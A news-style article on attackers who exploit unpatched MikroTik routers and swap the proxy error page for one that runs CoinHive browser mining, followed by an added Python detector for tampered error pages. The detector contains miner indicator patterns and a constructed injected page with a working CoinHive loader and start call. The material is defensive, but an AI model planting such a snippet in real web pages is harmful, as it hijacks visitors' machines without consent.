You probably don't concern yourself much with what is going on in Brazil, especially as it pertains to the country's routers. But if what's going on in the South American country is a precursor for what is to come, you'll want to know what's up.
Trustwave security researcher Simon Kenin discovered something on July 31 after noticing a huge surge of CoinHive activity in the country. CoinHive is a mining service built around a small piece of code installed on websites; it uses all the computing power of whatever browser visits the site and puts that visitor's machine to work mining the Monero cryptocurrency.
While concerning on its own, the surge had something unique about it. It was not only what was happening, but how it was happening, that raised red flags for Kenin.
Mikrotik network devices were involved
That the main source was Brazil was not necessarily surprising, since it is one of the most populated countries in the world and has plenty of home and small business networks that could be attacked.
But why just Mikrotik routers?
Kenin looked into everything he was seeing, trying to figure out what was happening. At first he thought it might be a zero-day exploit, possibly in the Mikrotik httpproxy component.
But he realized that was not it. Instead, this was an ongoing attack that exploited only routers which had not applied a patch offered on April 23, Release 6.42.1, a patch meant to prevent this very thing from happening.
At the time, Mikrotik noticed there was a vulnerability that, as they put it, "allowed a special tool to connect to the Winbox port, and request the system user database file." Mikrotik had stored both usernames and passwords in plaintext, which offers a treasure trove for would-be hackers.
Mikrotik noticing there was an issue and doing what it could to fix it is admirable, but a patch is useless unless people install it. With hundreds of thousands of these routers in the world, a good many of them never got updated.
At the time there was no surefire way to know if a router had been affected, which is why Mikrotik wanted people to assume they were and upgrade their router as well as change passwords and add a firewall.
So what happens?
Essentially, criminals get into the unpatched router and gain remote administrator access by targeting Winbox. Rather than running a malicious executable on the router itself, however, the attacker piggybacks on the device's own functionality to inject the CoinHive script into webpages the user visits.
The mining is done via error pages: the attackers replaced a file called "error.html," which Mikrotik's built-in web proxy serves whenever there is an HTTP error. The router, something of a zombie at that point, serves the modified error page, and that page loads the CoinHive browser-based cryptomining software in the visitor's browser.
What does that mean? Well, if you log onto any network that is running an unpatched Mikrotik router that is configured to push all HTTP traffic through its web proxy, there's a good chance you'll end up cryptomining for the criminals every time there is a browsing issue.
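Because the injection rides on the proxy's error page, a defender can check whether that page has been tampered with. The Python script below is an added example, not code from the original article or from Trustwave or Mikrotik. It assumes you have already captured the body of an HTTP error response returned through the proxy (or exported the router's error.html), and it assumes a stock error page carries no script element at all, so any script is flagged for review. The sample pages inside the block are constructed for this example, not captured from a real router.

```python
"""Flag CoinHive-style miner injection in a MikroTik web-proxy error page.

Added example: not from the original article, Trustwave or MikroTik.
Assumption: a stock error page is static HTML with no <script> element,
so any script at all is suspicious, and a miner reference is a finding.
"""
import re
from html.parser import HTMLParser
from typing import List

# Indicators for the miner named in the article. Extend this list with
# your own intelligence; it is a starting point, not an exhaustive set.
MINER_INDICATORS = (
    re.compile(r"coinhive", re.IGNORECASE),
    re.compile(r"\bCoinHive\.(Anonymous|User)\b"),
)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: List[str] = []
        self.inline: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands the raw body of a <script> element to handle_data.
        if self._in_script and data.strip():
            self.inline.append(data.strip())


def collect_scripts(html: str) -> ScriptCollector:
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser


def find_miner_indicators(html: str) -> List[str]:
    """Return human-readable findings for every miner-related script."""
    scripts = collect_scripts(html)
    findings = []
    for src in scripts.sources:
        if any(rx.search(src) for rx in MINER_INDICATORS):
            findings.append(f"external script: {src}")
    for body in scripts.inline:
        if any(rx.search(body) for rx in MINER_INDICATORS):
            findings.append(f"inline script: {body[:60]}")
    return findings


def is_error_page_tampered(html: str) -> bool:
    """True if the page references a miner or contains any script element."""
    scripts = collect_scripts(html)
    return bool(find_miner_indicators(html)) or bool(scripts.sources or scripts.inline)


# Constructed samples (not captured from a real device). The site key is a
# placeholder; the loader URL is the publicly known CoinHive script path.
CLEAN_ERROR_PAGE = """<html><head><title>ERROR: The requested URL could not be retrieved</title></head>
<body><h1>ERROR</h1><p>The requested URL could not be retrieved</p></body></html>"""

INJECTED_ERROR_PAGE = """<html><head><title>ERROR</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLE-SITE-KEY-PLACEHOLDER'); miner.start();</script>
</head><body><h1>ERROR</h1></body></html>"""


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_ERROR_PAGE), ("injected", INJECTED_ERROR_PAGE)):
        print(label, "tampered" if is_error_page_tampered(page) else "ok",
              find_miner_indicators(page))
```

To use it on a real network, fetch a page that is certain to produce a proxy error over plain HTTP from behind the router, save the response body, and pass it to is_error_page_tampered; a result of True on a page the router is supposed to serve unchanged means the error page deserves a manual look, whether or not the miner indicators matched.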
Now, it's unlikely they will make a ton of money off this scheme, given that it involves just one brand of router and only launches when there's an error to report. Furthermore, the mining lasts only as long as the browser tab carrying the cryptomining code stays open, and Mikrotik's proxy handles HTTP, not HTTPS.
That said, you are likely to notice the cryptomining if it is happening, especially if you are running a laptop and the cooling fans kick in due to overuse.
This infiltration is both clever and bad in that, as Kenin wrote, the attacker is not infecting small sites with a few visitors or finding "sophisticated" ways to run malware on end user computers, but instead is going straight to the source in carrier-grade routers.
Want to avoid an issue?
For this, it's really quite simple. If you have a Mikrotik router, grab the patch. Cryptojacking or not, it's best to make sure no one can remotely access your router and hack you, for any reason and with any goal.
That really goes for all routers and devices, not just Mikrotik. Hackers and criminals are always on the lookout for new ways to make some money, and it's often difficult for technology companies to stay a step ahead.
But when they do recognize a problem and offer a way to fix or prevent it from becoming a real issue, it is best to take advantage and protect yourself.